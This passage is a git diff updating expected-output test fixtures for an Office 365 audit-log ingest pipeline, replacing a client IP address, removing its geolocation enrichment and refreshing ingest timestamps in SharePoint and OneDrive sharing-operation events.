"{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cType\\u003eEdit\\u003c/Type\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"1cb54d72-3a76-4a7c-7b3d-08d7b17b4ec9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"AnonymousLinkCreated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"UniqueSharingId\":\"d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db", "CreationTime": "2020-02-14T18:25:45", "EventData": "\u003cType\u003eEdit\u003c/Type\u003e", 
@@ -209,10 +209,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cPermissions granted\\u003eContribute\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"a8c23ab8-9447-4824-3208-08d7b17b4e5e\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"SharingLinks.7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8.AnonymousEdit.d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cPermissions granted\\u003eContribute\\u003c/Permissions 
granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"a8c23ab8-9447-4824-3208-08d7b17b4e5e\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"SharingLinks.7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8.AnonymousEdit.d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db", "CreationTime": "2020-02-14T18:25:45", "EventData": "\u003cPermissions granted\u003eContribute\u003c/Permissions granted\u003e", 
@@ -243,10 +243,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eLimited Access\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"88a041e3-2f3a-483c-cf76-08d7b17b4e5b\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"Limited Access System Group\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eLimited Access\\u003c/Permissions 
granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"88a041e3-2f3a-483c-cf76-08d7b17b4e5b\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"Limited Access System Group\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db", "CreationTime": "2020-02-14T18:25:44", "EventData": "\u003cPermissions granted\u003eLimited Access\u003c/Permissions granted\u003e", 
@@ -277,10 +277,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eSystem.LimitedEdit\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"98633e47-3540-4e8a-bcfc-08d7b17b4e48\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eSystem.LimitedEdit\\u003c/Permissions 
granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"98633e47-3540-4e8a-bcfc-08d7b17b4e48\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db", "CreationTime": "2020-02-14T18:25:44", "EventData": "\u003cPermissions granted\u003eSystem.LimitedEdit\u003c/Permissions granted\u003e", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json-expected.json index 2d6c639ee8b..c2765e337eb 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json-expected.json 
@@ -43,7 +43,7 @@ }, "client": {}, "event": { - "ingested": "2021-06-17T07:32:55.229349700Z", + "ingested": "2021-12-09T13:42:49.545726200Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:50\",\"EventData\":\"\\u003cGroup\\u003eSite Members\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"4d1a6a2b-360c-423d-96e5-08d7b3cacd83\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"Everyone except external users\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", 
@@ -115,7 +115,7 @@ }, "client": {}, "event": { - "ingested": "2021-06-17T07:32:55.229356800Z", + "ingested": "2021-12-09T13:42:49.545736200Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:50\",\"EventData\":\"\\u003cGroup\\u003eSite Owners\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"56696ec0-5a7e-4561-5e88-08d7b3cacd4a\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"SHAREPOINT\\\\system\",\"TargetUserOrGroupType\":\"Member\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", 
@@ -187,7 +187,7 @@ }, "client": {}, "event": { - "ingested": "2021-06-17T07:32:55.229358900Z", + "ingested": "2021-12-09T13:42:49.545741900Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:50\",\"EventData\":\"\\u003cGroup\\u003eSite Owners\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"b8c880ff-e8fe-407c-9ce9-08d7b3cacd07\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"SIEMTest Owners\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", 
@@ -259,7 +259,7 @@ }, "client": {}, "event": { - "ingested": "2021-06-17T07:32:55.229361100Z", + "ingested": "2021-12-09T13:42:49.545747700Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:50\",\"EventData\":\"\\u003cGroup\\u003eSite Members\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"483f657f-9141-45fc-b141-08d7b3caccfb\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"SIEMTest Members\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", 
@@ -331,7 +331,7 @@ }, "client": {}, "event": { - "ingested": "2021-06-17T07:32:55.229363Z", + "ingested": "2021-12-09T13:42:49.545752500Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:49\",\"EventData\":\"\\u003cGroup\\u003eSite Owners\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"13004a30-d15a-48a5-16ec-08d7b3caccc0\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"SHAREPOINT\\\\system\",\"TargetUserOrGroupType\":\"Member\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", @@ -362,25 +362,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -417,7 +399,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
@@ -429,12 +411,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:55.229364700Z", - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003ccopyRoleAssignments\\u003eFalse\\u003c/copyRoleAssignments\\u003e\\u003cclearSubScopes\\u003eFalse\\u003c/clearSubScopes\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"dd162cd7-5df5-4fef-078a-08d7b17b4e95\",\"ItemType\":\"List\",\"ListId\":\"b108938d-3546-4359-925d-a1b54b4db8c2\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com//personal/asr_testsiem_onmicrosoft_com/Sharing Links\",\"Operation\":\"SharingInheritanceBroken\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceRelativeUrl\":\"Sharing Links\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:49.545757200Z", + "original": 
"{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003ccopyRoleAssignments\\u003eFalse\\u003c/copyRoleAssignments\\u003e\\u003cclearSubScopes\\u003eFalse\\u003c/clearSubScopes\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"dd162cd7-5df5-4fef-078a-08d7b17b4e95\",\"ItemType\":\"List\",\"ListId\":\"b108938d-3546-4359-925d-a1b54b4db8c2\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com//personal/asr_testsiem_onmicrosoft_com/Sharing Links\",\"Operation\":\"SharingInheritanceBroken\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceRelativeUrl\":\"Sharing Links\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", "kind": "event", @@ -470,25 +452,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -529,7 +493,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
@@ -541,12 +505,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:55.229366400Z", - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cType\\u003eEdit\\u003c/Type\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"1cb54d72-3a76-4a7c-7b3d-08d7b17b4ec9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"AnonymousLinkCreated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"UniqueSharingId\":\"d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:49.545762400Z", + "original": 
"{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cType\\u003eEdit\\u003c/Type\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"1cb54d72-3a76-4a7c-7b3d-08d7b17b4ec9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"AnonymousLinkCreated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"UniqueSharingId\":\"d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", "kind": "event", @@ -582,25 +546,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -642,7 +588,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
